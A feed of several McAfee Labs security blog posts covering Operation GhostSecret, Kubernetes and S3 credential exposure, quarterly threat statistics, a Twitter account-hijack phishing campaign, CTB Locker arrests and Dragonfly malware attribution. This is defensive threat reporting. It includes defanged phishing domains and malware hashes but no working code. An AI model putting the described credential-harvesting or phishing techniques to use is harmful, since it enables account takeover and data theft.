Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/global-malware-campaign-pilfers-data-from-critical-infrastructure-entertainment-finance-health-care-and-other-industries/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/global-malware-campaign-pilfers-data-from-critical-infrastructure-entertainment-finance-health-care-and-other-industries/#respond Wed, 25 Apr 2018 04:01:24 +0000 https://securingtomorrow.mcafee.com/?p=88419 McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. (For an extensive […]

The post Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries appeared first on McAfee Blogs.

]]>
McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. (For an extensive analysis by the Advanced Threat Research team, see “Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide.”

The campaign is extremely complicated, leveraging a number of implants to steal information from infected systems and is intricately designed to evade detection and deceive forensic investigators. The implants vary considerably and although they share some functionality and code, they are categorized as different families. As McAfee Advanced Threat Research analysts investigated this campaign, we recognized many similarities to indicators used in the 2014 Sony Pictures attack.

A portion of this campaign aimed at the Turkish financial sector using the Bankshot implant was recently discovered by McAfee Advanced Threat Research analysts. This appears to have been the initial stage of Operation GhostSecret, as within days of publication, new attacks appeared  beyond the financial sector. Between March 14 and 18, we observed the data reconnaissance implant in organizations across 17 countries.

Delving further into this campaign reveals a narrow list of organizations across the globe; the threat actors have been explicit about who can connect from which IP address. Reviewing the WHOIS information for these IP addresses shows us that there is some correlation in geography, although there are no additional clues why these addresses were used.

As we monitor this campaign, it is clear that the publicity associated with the (we assume) first phase of this campaign did nothing to slow the attacks. The threat actors not only continued but also increased the scope of the attack, both in types of targets and in the tools they used. We try to avoid using the word sophisticated because it is both subjective and overused. Nonetheless, the attackers have significant capabilities, demonstrated by their tools development and the pace at which they operate.

Fighting cybercrime is a global effort best undertaken through effective partnerships between the public and private sectors. McAfee is working with Thai government authorities to take down the control server infrastructure of Operation GhostSecret, while preserving the systems involved for further analysis by law enforcement authorities. By creating and maintaining partnerships with worldwide law enforcement, McAfee demonstrates that we are stronger together.

The post Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/global-malware-campaign-pilfers-data-from-critical-infrastructure-entertainment-finance-health-care-and-other-industries/feed/ 0
Cloud Clustering Vulnerable to Attacks https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cloud-clustering-vulnerable-to-attacks/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cloud-clustering-vulnerable-to-attacks/#respond Mon, 16 Apr 2018 16:00:43 +0000 https://securingtomorrow.mcafee.com/?p=88384 The authors thank John Fokker and Marcelo CaroVargas for their contributions and insights. In our upcoming talk at the Cloud Security Alliance Summit at the RSA Conference, we will focus our attention on the insecurity of cloud deployments. We are interested in whether attackers can use compromised cloud infrastructure as viable backup resources as well […]

The post Cloud Clustering Vulnerable to Attacks appeared first on McAfee Blogs.

]]>
The authors thank John Fokker and Marcelo CaroVargas for their contributions and insights.

In our upcoming talk at the Cloud Security Alliance Summit at the RSA Conference, we will focus our attention on the insecurity of cloud deployments. We are interested in whether attackers can use compromised cloud infrastructure as viable backup resources as well as for cryptocurrency mining and other illegitimate uses. The use of containers has increased rapidly, especially when it comes to managing the deployment of applications. Our latest market survey found that 83% of organizations worldwide are actively testing or using containers in production. Applications need authentication for load balancing, managing the network between containers, auto-scaling, etc. One solution (called a cluster manager) for the automated installation and orchestration of containers is Kubernetes.

Some key components in the Kubernetes architecture appear below:

High-level Kubernetes architecture.

  • Kubernetes master server: The managing machine oversees one or more nodes
  • Node: A client that runs tasks as delegated by the user and Kubernetes master server
  • Pod: An application (or part of an application) that runs on a node. The smallest unit that can be scheduled to be deployed. Not intended to live long.

For our article, we need to highlight the etcd storage on the master server. This database stores the configuration data of the cluster and represents the overall state of the cluster at a given time. Kubernetes saves these secrets in Base64 strings; before Version 2.1 there was no authentication in etcd.

With that knowledge, security researcher Giovanni Collazo from Puerto Rico started to query the Shodan database for etcd databases connected to the Internet. He discovered many and by executing a query, some of these databases started to reveal a lot of credentials. Beyond leaking credentials from databases and other accounts, what other scenarios are possible?

Leaking Credentials

There are several ways that we can acquire credentials for cloud services without hacking into panels or services. By “creatively” searching public sites and repositories, we can find plenty of them. For example, when we searched on GitHub, we found more than 380,000 results for certain credentials. Let’s assume that half of them are useful: We would have 190,000 potentially valid credentials. As Collazo did for etcd, one can also use the Shodan search engine to query for other databases. By creating the right query for Django databases, for example, we were able to identify more cloud credentials. Amazon’s security team proactively scans GitHub for AWS credentials and informs their customers if they find credentials.

Regarding Kubernetes: Leaked credentials, complete configurations of the DNS, load balancers, and service accounts offer several possible scenarios. These include exfiltrating data, rerouting traffic, or even creating malicious containers in different nodes (if the service accounts have enough privileges to execute changes in the master server).

Creating malicious containers.

One of the biggest risks concerning leaked credentials is the abuse of your cloud resources for cryptomining. The adversaries can order multiple servers under your account to start cryptomining, enriching their bank accounts while you pay for the computing power “you” ordered.

Open Buckets

We have heard a lot about incidents in which companies have not secured their Amazon S3 buckets. A number of tools can scan for “open” buckets and download the content. Attackers would be most interested in write-enabled rights on a bucket. For our Cloud Security Alliance keynote address at RSA, we created a list of Fortune 1000 companies and looked for readable buckets. We discovered quite a few. That is no surprise, but if you combine the read-only buckets information with the ease of harvesting credentials, the story changes. With open and writable buckets, the adversaries have plenty of opportunities: storing and injecting malware, exfiltrating and manipulating data, etc.

McAfee cloud researchers offer an audit tool that, among other things, verifies the rights of buckets. As we write this post, more than 1,200 writable buckets belonging to a multitude of companies, are accessible to the public. One of the largest ad networks in the world had a publicly writable bucket. If adversaries could access that network, they could easily inject malicious code into advertisements. (As part of our responsible disclosure process, we reported the issue, which was fixed within hours.) You can read an extensive post on McAfee cloud research and how the analysts exposed possible man-in-the-middle attacks leveraging writable buckets.

Clustering the Techniques

To combat ransomware, many organizations use the cloud to back up and protect their data. In our talk we will approach the cloud as an attack vector for spreading ransomware. With the leaked credentials we discovered from various sources, the open and writable buckets created a groundwork for storing and spreading our ransomware. With attackers having a multitude of credentials and storage places such as buckets, databases, and containers, defenders would have difficulty keeping up. We all need to pay attention to where we store our credentials and how well we monitor and secure our cloud environments.

The post Cloud Clustering Vulnerable to Attacks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/cloud-clustering-vulnerable-to-attacks/feed/ 0
‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cryptocurrency-hijacking-ransomware-fileless-malware/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cryptocurrency-hijacking-ransomware-fileless-malware/#respond Mon, 12 Mar 2018 04:03:31 +0000 https://securingtomorrow.mcafee.com/?p=85151 Today McAfee published the McAfee Labs Threats Report: March 2018. The report looks into the growth and trends of new malware, ransomware, and other threats in Q4 2017. McAfee Labs saw on average eight new threat samples per second, and the increasing use of fileless malware attacks leveraging Microsoft PowerShell. The Q4 spike in Bitcoin value prompted cybercriminals to focus on cryptocurrency hijacking through a variety of methods, including malicious Android apps.

The post ‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware appeared first on McAfee Blogs.

]]>
Today McAfee published the McAfee Labs Threats Report: March 2018. The report looks into the growth and trends of new malware, ransomware, and other threats in Q4 2017. McAfee Labs saw on average eight new threat samples per second, and the increasing use of fileless malware attacks leveraging Microsoft PowerShell. The Q4 spike in Bitcoin value prompted cybercriminals to focus on cryptocurrency hijacking through a variety of methods, including malicious Android apps.

Each quarter, McAfee Labs, led by the Advanced Threat Research team, assesses the state of the cyber threat landscape based on threat data gathered by the McAfee Global Threat Intelligence cloud from hundreds of millions of sensors across multiple threat vectors around the world. McAfee Advanced Threat Research complements McAfee Labs by providing in-depth investigative analysis of cyberattacks from around the globe.

Cybercriminals Take on New Strategies, Tactics

The fourth quarter of 2017 saw the rise of newly diversified cybercriminals, as a significant number of actors embraced novel criminal activities to capture new revenue streams. For instance, the spike in the value of Bitcoin prompted actors to branch out from moneymakers such as ransomware, to the practice of hijacking Bitcoin and Monero wallets. McAfee researchers discovered Android apps developed exclusively for the purpose of cryptocurrency mining and observed discussions in underground forums suggesting Litecoin as a safer model than Bitcoin, with less chance of exposure.

Cybercriminals also continued to adopt fileless malware leveraging Microsoft PowerShell, which surged 432% over the course of 2017, as the threat category became a go-to toolbox. The scripting language was used within Microsoft Office files to execute the first stage of attacks.

Health Care Targeted

Although publicly disclosed security incidents targeting health care decreased by 78% in the fourth quarter of 2017, the sector experienced a dramatic 210% overall increase in incidents in 2017. Through their investigations, McAfee Advanced Threat Research analysts conclude many incidents were caused by organizational failure to comply with security best practices or address known vulnerabilities in medical software.

McAfee Advanced Threat Research analysts looked into possible attack vectors related to health care data, finding exposed sensitive images and vulnerable software. Combining these attack vectors, analysts were able to reconstruct patient body parts, and create three-dimensional models.

Q4 2017 Threats Activity

Fileless malware. In Q4 JavaScript malware growth continued to slow with new samples decreasing by 9%, while new PowerShell malware more than tripled, growing 267%.

Security incidents. McAfee Labs counted 222 publicly disclosed security incidents in Q4, a decrease of 15% from Q3. 30% of all publicly disclosed security incidents in Q4 took place in the Americas, followed by 14% in Europe and 11% in Asia.

Vertical industry targets. Public, health care, education, and finance, respectively, led vertical sector security incidents for 2017.

  • Health Care. Disclosed incidents experienced a surge in 2017, rising 210%, while falling 78% in Q4.
  • Public sector. Disclosed incidents decreased 15% in 2017, down 37% in Q4.
  • Disclosed incidents rose 125% in 2017, remaining stagnant in Q4.
  • Disclosed incidents rose 16% in 2017, falling 29% in Q4. 

Regional targets

  • Disclosed incidents rose 46% in 2017, falling 46% in Q4.
  • Disclosed incidents fell 58% in 2017, rising 28% in Q4.
  • Disclosed incidents fell 20% in 2017, rising 18% in Q4.
  • Disclosed incidents rose 42% in 2017, falling 33% in Q4. 

Attack vectors. In Q4 and 2017 overall, malware led disclosed attack vectors, followed by account hijacking, leaks, distributed denial of service, and code injection.

Ransomware. The fourth quarter saw notable industry and law enforcement successes against criminals responsible for ransomware campaigns. New ransomware samples grew 59% over the last four quarters, while new ransomware samples growth rose 35% in Q4. The total number of ransomware samples increased 16% in the last quarter to 14.8 million samples.

Mobile malware. New mobile malware decreased by 35% from Q3. In 2017 total mobile malware experienced a 55% increase, while new samples declined by 3%.

Malware overall. New malware samples increased in Q4 by 32%. The total number of malware samples grew 10% in the past four quarters.

Mac malware. New Mac OS malware samples increased by 24% in Q4. Total Mac OS malware grew 58% in 2017.*

Macro malware. New macro malware increased by 53% in Q4, declined by 35% in 2017.

Spam campaigns. 97% of spam botnet traffic in Q4 was driven by Necurs—recent purveyor of “lonely girl” spam, pump-and-dump stock spam, and Locky ransomware downloaders—and by Gamut—sender of job offer–themed phishing and money mule recruitment emails.

*This blog post has been edited to correct the percentage increase of Mac OS malware in 2017.

For more information on these threat trends and statistics, please visit:

Twitter @Raj_Samani & @McAfee_Labs.

The post ‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-examines-cryptocurrency-hijacking-ransomware-fileless-malware/feed/ 0
MWC 2018: Digital and Mobile Security in the 5G IoT Era https://securingtomorrow.mcafee.com/business/mwc-2018-digital-mobile-security-5g-iot-era/ https://securingtomorrow.mcafee.com/business/mwc-2018-digital-mobile-security-5g-iot-era/#respond Tue, 27 Feb 2018 08:01:30 +0000 https://securingtomorrow.mcafee.com/?p=84704 Mobile World Congress 2018 is upon us and the big news includes the launch of a bunch of new devices, including the Sony Xperia XZ2 Compact, Samsung Galaxy S9, Sony Xperia XZ Premium 2 and Samsung Galaxy Tab S4.

The post MWC 2018: Digital and Mobile Security in the 5G IoT Era appeared first on McAfee Blogs.

]]>
Mobile World Congress 2018 is upon us and the big news includes the launch of a bunch of new devices, including the Sony Xperia XZ2 Compact, Samsung Galaxy S9, Sony Xperia XZ Premium 2 and Samsung Galaxy Tab S4.

In addition to these and dozens of other devices launching at this year’s event in Barcelona, we are seeing the acceleration of the trend for domestic and industrial smart devices, voice-controlled digital assistants and other internet of things (IoT) enabled smart devices.

Google, for example, is using MWC 2018 as a platform to publicise Google Assistant and the Google Home smart speaker, though one thing we still haven’t heard enough about are the many new security threats and issues surrounding new smart devices, digital assistants and IoT technologies.

Biometric Authentication, 5G Realities and IoT security

Another notable trend at MWC 2018 has been the focus from Samsung and some of the other major mobile players on improved forms of biometric authentication, with Samsung releasing a much-improved Iris Scanner as part of the new Galaxy S9 range.

It’s certainly a really positive move to see this focus on identity authentication at this year’s show, with a notable shift at this year’s event from the hype surrounding virtual and augmented reality and voice-controlled smart homes to far more realistic and practical concerns around security, biometrics and the real-world use cases of superfast 5G networking tech.

Much of the conversation around 5G, of course, is still dominated around how edge computing and low latency in 5G networks will actually translate into valuable and useable services for consumers and businesses alike.

These new 5G use cases dominated the IoT news at MWC 2018, with numerous exhibitors talking up their latest 5G IoT applications and concepts. And almost by default digital security has also become one of the hottest topics in Barcelona this year, as small developers and the major multinational mobile brands alike wake up to the fact that security is of paramount importance across the entire IoT supply chain

Evolving Digital Security for the 5G IoT Era

Firms are realising that their digital security strategy has to evolve at the same pace as the many new developments in the current buzzword bingo card such as 5G IoT, artificial intelligence (AI) and machine learning.

Failure to undertake the appropriate due diligence in these new emerging technologies open them up for significant penalties when the inevitable data breaches occur.

In addition to the focus on improving mobile handset security and raising awareness of digital security issues in the smart home, the onus for 5G network level security really needs to shift back to the telecommunications companies themselves.

The 5G Security Challenge for Telecoms

The bottom line is this: the security of 5G networks presents a fundamental challenge to the telecommunications industry at large. Something that the hype machine surrounding 5G at MWC 2018 generally fails to highlight, for obvious reasons!

The promise of 5G-enabled services in smart cities, connected cars and across the burgeoning e-health sector, for example, is clear. Yet the fact that network-wide security and security across the IoT value chain is fundamental to these types of applications and services operating safely is still too often overlooked.

Driverless cars, smart surgery and IoT applications across the manufacturing sector are good examples to cite, where digital security is crucial.

All of which is why we as an industry have to work better together – from digital security specialists through to 5G IoT app and hardware developers through to the multinational telecommunications companies themselves – to ensure that we are doing all we can to meet the security challenges and the many increasingly sophisticated attacks that are sure to come in the 5G era.

The post MWC 2018: Digital and Mobile Security in the 5G IoT Era appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mwc-2018-digital-mobile-security-5g-iot-era/feed/ 0
Why is the Technology Industry Shirking its Security Responsibilities? https://securingtomorrow.mcafee.com/business/technology-industry-shirking-security-responsibilities/ https://securingtomorrow.mcafee.com/business/technology-industry-shirking-security-responsibilities/#respond Sat, 24 Feb 2018 09:00:57 +0000 https://securingtomorrow.mcafee.com/?p=84689 No sooner have we had time to recover from the post-CES jet-lag in January than Mobile World Congress 2018 rolls around. These two events have cemented themselves into the mobile and consumer technology industries’ calendars as key opportunities to showcase the latest hardware and software products and services, amidst a flurry of media hype and […]

The post Why is the Technology Industry Shirking its Security Responsibilities? appeared first on McAfee Blogs.

]]>
No sooner have we had time to recover from the post-CES jet-lag in January than Mobile World Congress 2018 rolls around. These two events have cemented themselves into the mobile and consumer technology industries’ calendars as key opportunities to showcase the latest hardware and software products and services, amidst a flurry of media hype and eager expectation from early adopters worldwide. So what’s in store for the technology industry and its eager consumers in 2018?

If anything, CES this year was a little flat, with little to see in the way of real innovation. This year’s show was a year of ‘iteration’ not ‘innovation’, particularly in the IT security industry, where the conversation at the show was dominated by promises of ‘security by design’ but no real demonstration of this. I was personally very interested to find out more about the latest smart safe that was unveiled at the show, billed as “a smarter way to keep valuables safe”.

Here was a new IoT device that, if anything, surely had to have the best digital security baked into it by design, no?

Unfortunately, that particular internet-connected safe turned out to be something of a damp squib, mainly because it proved to be incredibly easy to crack open. One BBC Tech reporter reported a worrying error that failed to trigger a theft alert. We simply banged on the top of the safe and it opened. What is more remarkable is that this vulnerability is well known,  I had an issue with a smart safe of my own when the battery ran out and of course I lost my key.  One quick search on YouTube revealed banging on the top of the safe would work, and guess what… it actually did! So much for ‘digital peace of mind’…

That’s merely one example of a slightly broken product that clearly needs a little more development before it hits the market. But that single widely-publicized security snafu was, unfortunately, tellingly symptomatic of an industry-wide trend of shirking responsibility for consumers’ digital (and physical) security.

All too often, digital and mobile security is still considered to be an afterthought, by hardware manufacturers and software developers alike, which is simply no longer viable. Particularly given the context of the increasing number and sophistication of cyber-attacks on mobile devices. See, for a very good example of this, the results of McAfee’s latest Mobile Threat Report 2018 – to be released at MWC 2018 – which reveals an explosion in mobile malware and dramatic changes in the mobile landscape over the last year.

If smartphone manufacturers genuinely wish to charge consumers in excess of £1000 for handsets, and provide finance plans to fund them then simply put, we need to know they are trustworthy. Shifting the blame onto the user, rather than building adequate methods of prevention into our business models is not acceptable.

So onto Mobile World Congress 2018 in Barcelona this year, we will be making some major announcements regarding a number of strategic partnerships with some of the world’s telecoms giants, designed to keep mobile users and the data on their increasingly number of smart devices safe, both in the home and on the go.

After all, it’s not that flash £1000 phone in your pocket that the real cybercrimals are after. It’s the data that’s stored within it, that can potentially give them complete access to your bank account, your confidential business data and more. And as the number of devices we have in our homes, our bags, our cars and our offices continues to proliferate, so does the number of attack vectors that cybercriminals can use to fraudulently obtain money.

The post Why is the Technology Industry Shirking its Security Responsibilities? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/technology-industry-shirking-security-responsibilities/feed/ 0
The Reality of an Incoming C1 Cyberattack on the UK https://securingtomorrow.mcafee.com/business/reality-incoming-c1-cyberattack-uk/ https://securingtomorrow.mcafee.com/business/reality-incoming-c1-cyberattack-uk/#respond Mon, 29 Jan 2018 17:09:24 +0000 https://securingtomorrow.mcafee.com/?p=84048 “When, not if.” Ciaran Martin, head of the U.K.’s National Cyber Security Centre (NCSC), used those words to say he is expecting a devastating cyberattack will hit the U.K. in the next two years. The attack, he believes, will bring disruption to British elections and critical infrastructure. These remarks were made in light of newly […]

The post The Reality of an Incoming C1 Cyberattack on the UK appeared first on McAfee Blogs.

]]>
“When, not if.”

Ciaran Martin, head of the U.K.’s National Cyber Security Centre (NCSC), used those words to say he is expecting a devastating cyberattack will hit the U.K. in the next two years. The attack, he believes, will bring disruption to British elections and critical infrastructure. These remarks were made in light of newly released figures detailing the number of cyberattacks on the U.K. in the last 15 months. Martin said the U.K. has been fortunate to avoid a so-called category one (C1) attack, broadly defined as an attack that might cripple infrastructure such as energy supplies and the financial services sector.

His prediction initially brings one thing to mind – WannaCry. A strain of the ransomware impacted 50 countries and infected more than 250,000 machines in just one day. Its exploits included a massive takedown of 16 U.K. NHS medical centers. WannaCry was rated by the NCSC as a C2 level of attack, milder than the C1 Martin says is still to come.

Organisations across the U.K. were unprepared when WannaCry hit last May, and there is no simple fix to protect everyone. Martin concedes total protection is impossible, stating “Some attacks will get through. What you need to do is cauterise the damage.” The NCSC has been gradually building defenses and is due to publish a 60-plus-page dossier outlining what has worked and what has not since it opened in October 2016. Defense is a responsibility that falls on all of our shoulders, and begins with a new mentality that attacks are inevitable, and preparedness vital for a “culture of security.”

There is a misconception that cybersecurity is an IT issue that affects systems, not ordinary people. The reality is that cybercrime hurts us all. A massive cyberattack impacts economies, governments, innovation, growth, even global state of mind. If we all accept the reality of a potential C1 attack, we also accept the challenge to bond together in a new pact to protect the assets and values we hold dear. We must to do this. It’s a matter of when, not if.

To learn more about modern day threat landscape, be sure to follow us at @McAfee and @McAfee_Labs.

The post The Reality of an Incoming C1 Cyberattack on the UK appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/reality-incoming-c1-cyberattack-uk/feed/ 0
Twitter Accounts of US Media Under Attack by Large Campaign https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/twitter-accounts-of-us-media-under-attack-by-large-campaign/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/twitter-accounts-of-us-media-under-attack-by-large-campaign/#respond Wed, 24 Jan 2018 00:59:27 +0000 https://securingtomorrow.mcafee.com/?p=83864 A previously reported campaign purportedly carried out by Turkish hacker group “Ayyildiz Tim” targeting high-profile, verified Twitter accounts with the purpose of spreading Turkish political propaganda appears to have escalated within the last 24 hours. McAfee Advanced Threat Research has investigated the new events and discovered the following.

The post Twitter Accounts of US Media Under Attack by Large Campaign appeared first on McAfee Blogs.

]]>
A previously reported campaign purportedly carried out by Turkish hacker group “Ayyildiz Tim” targeting high-profile, verified Twitter accounts with the purpose of spreading Turkish political propaganda appears to have escalated within the last 24 hours. McAfee Advanced Threat Research has investigated the new events and discovered the following. On January 13, the Twitter account of the Indian ambassador to the United Nations was taken over and spread pro-Pakistan and pro-Turkey postings:

What seemed to be a single event soon became a targeted campaign that we discovered in cooperation with our partner SocialSafeGuard. Combining their technology and our threat researchers, we started to build a timeline of events:

 

In each case in this timeline, the account was restored after several hours.

Once the accounts were compromised, the attackers direct-messaged the account contacts with propaganda for their cause or with a link to convince them to click on a phishing site that would harvest the Twitter credentials of the victim.

One example of such a site is hxxp://fox-news.medianewsonline.com/.

Visiting the page shows the following:

If we look at the source code of the page, we discover several Turkish-language segments.

Focusing on the domains used for the phishing sites, we discovered more registered sites. Some examples:

  • mypressonline.com
  • official-twitter-jp.mypressonline.com
  • feedbac-verifv.mypressonline.com

Who is behind this campaign? According to the messages used, the Turkish hacker group “Ayyildiz Tim” (AYT) claims to be responsible for the attacks. The group was founded in 2002 and advocates Turkish state ideology. In the following example, we see the background image of Greta van Susteren has changed to one of the many wallpapers used by the group:

We advise journalists in particular, as well as others in high-profile positions, to follow appropriate safeguards to protect their accounts.

We are aware that one of the tactics from this group is to use Direct Messaging to communicate with other prominent Twitter accounts. There is also evidence that private messaging history has been accessed from certain compromised accounts of prominent figures, along with other sensitive or confidential information such as private phone numbers and emails.  If you receive a message, even from someone you know or trust, be aware that the message may not be from the person you know. It is potentially directing you to malicious content.

You absolutely should verify through an alternate channel that the link is safe to click.

The post Twitter Accounts of US Media Under Attack by Large Campaign appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/twitter-accounts-of-us-media-under-attack-by-large-campaign/feed/ 0
McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/advanced-threat-research/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/advanced-threat-research/#respond Wed, 20 Dec 2017 12:00:38 +0000 https://securingtomorrow.mcafee.com/?p=83276 In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

]]>
In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

Today, with the arrest of individuals suspected of infecting computer systems by spreading the CTB Locker malware, a clear message has been sent—involvement in cybercrime is not zero-risk.

CTB Locker

CTB Locker, also known as Critroni, is known as one of the largest ransomware families—helping to drive a new ransomware surge of 165 percent in 2015 as one of the top three ransomware families, and earning a spot as No. 1 just a year later. Operation Tovar, in which law enforcement agencies took down the infrastructure responsible for spreading CryptoLocker, created a need for more malware—CTB Locker and CryptoWall malware families helped to fill the gap.

In June 2014, the CTB Locker authors began to advertise the malware family on the underground scene at a cost of $3,000USD, where people could buy the first versions for $1,500USD. The authors also offered an affiliate program, which made CTB Locker infamous. By sharing a percentage of the received ransoms, the affiliates ran the greater risk—because they had to spread the ransomware—but they also enjoyed the higher profits. By using exploit kits and spam campaigns, the malware was distributed all over the world, mostly targeting “Tier 1” countries, those in which the victims could afford to pay and most likely would pay the ransom. Midway through 2015, we gained unique information from an affiliate server that helped us tremendously in the subsequent investigations.

A CTB Locker affiliate server.
An example of CTB Locker source code.

Besides the use of an affiliate server in CTB Locker’s infrastructure, two other components complete the setup: a gateway server and a payment server.

Attacks Begin to Grow

During 2016, a massive spam campaign struck the Netherlands. Emails in Dutch seemed to originate from one of the largest telco providers. The emails claimed to have the latest bill attached. There was no bill, of course, rather CTB Locker asking for around $400USD of ransom to return files. The grammar and word usage was near perfect—not what we commonly observe—and the names in the email were proof of a well-prepared campaign. More than 200 cases in the Netherlands alone were filed with regards to these infections.

With attacks growing in number, the Dutch High Tech Crime Unit began an investigation. The unit approached McAfee’s Advanced Threat Research team to assist in identifying samples and answering questions.

Following our research, we were kept updated and were informed that in the early morning of December 14 operation “Bakovia” started. The initial research was on the CTB Locker ransomware but based on information from the U.S. Secret Service, it was determined that the same suspected gang was also linked to distribution of Cerber ransomware—another major family.

The Arrests

During the operation in East Romania, six houses were searched whereby the investigators seized a significant amount of hard-drives, laptops, external-storage, crypto-currency mining rigs, and hundreds of SIM cards. Suspects were arrested for allegedly spreading CTB Locker ransomware, and other suspects allegedly responsible for spreading Cerber were arrested at the airport in Bucharest.

Watch video of arrests. 

The law enforcement action emphasizes the value of public-private partnerships and underscores the determination behind the McAfee mantra “Together is power.”

The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/advanced-threat-research/feed/ 0
Operation Dragonfly Analysis Suggests Links to Earlier Attacks https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-analysis-suggests-links-to-earlier-attacks/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-analysis-suggests-links-to-earlier-attacks/#respond Mon, 18 Dec 2017 05:03:12 +0000 https://securingtomorrow.mcafee.com/?p=83197 On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014. Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any […]

The post Operation Dragonfly Analysis Suggests Links to Earlier Attacks appeared first on McAfee Blogs.

]]>
On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014.

Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any further information regarding the source and possible motivations of those behind the campaign. The campaign targets energy companies around the world by leveraging spear-phishing emails that, once successful, allow the attackers to download Trojan software. The Trojans provide access to the victims’ systems and networks.

Going Beyond Energy

Although initial reports showed Dragonfly attacks targeting the energy sector, investigations by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries. Everything about this campaign points to a well-prepared assault that carefully considers each target, and conducts reconnaissance before taking any measures to exploit compromised targets.

We saw the group use several techniques to get a foothold in victims’ networks, including spear phishing, watering holes, and exploits of supply-chain technologies via previous campaigns. By compromising well-established software vulnerabilities and embedding within them “backdoor” malware, the victims think they are installing software from a trusted vendor, while unaware of the supply-side compromise.

Once the attackers have a foothold, they create or gain user accounts to operate stealthily. Using the remote-desktop protocol to hop among internal or external systems, they connect either to a control server if the risk is minimal or use an internal compromised server to conduct operations.

The last wave of attacks used several backdoors and utilities. In analyzing the samples, we compared these with McAfee’s threat intelligence knowledge base of attack artifacts.

One of the starting points was a Trojan in the 2017 campaign with the following hashes:

  • MD5: da9d8c78efe0c6c8be70e6b857400fb1
  • SHA-256: fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9

Comparing this code, we discovered another sample from the group that was used in a July 2013 attack:

  • MD5: 4bfdda1a5f21d56afdc2060b9ce5a170
  • SHA-256: 07bd08b07de611b2940e886f453872aa8d9b01f9d3c61d872d6cfe8cde3b50d4
  • Filename: fl.exe

The file was downloaded after a Java exploit executed on the victim’s machine, according to the 2013 attack report. After analyzing the 2013 sample, we noticed that some of the executable’s resources were in Russian.

Comparing the code, we find the 2017 sample has a large percentage of the same code as the backdoor used in the 2013 attacks. Further, some code in the 2017 backdoor is identical to code in the application TeamViewer, a legitimate remote administration tool used by many around the world. By incorporating the code and in-memory execution, the attackers avoid detection and leave no trace on disk.

The correlating hash we discovered that contained the same TeamViewer code was reported by Crysys, a Hungarian security company. In their report on about ‘“TeamSpy,” they mentioned the hash we correlated as well: 708ceccae2c27e32637fd29451aef4a5. This particular sample had the following compile date details: 2011:09:07 – 09:27:58+01:00

The TeamSpy attacks were originally aimed at political and human right activists living in the Commonwealth of Independent States (the former Soviet Union) and eastern European countries. Although the report attributes the attacks to a threat actor or actors and shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. With identical code reuse, could the TeamSpy campaign be the work of Dragonfly?

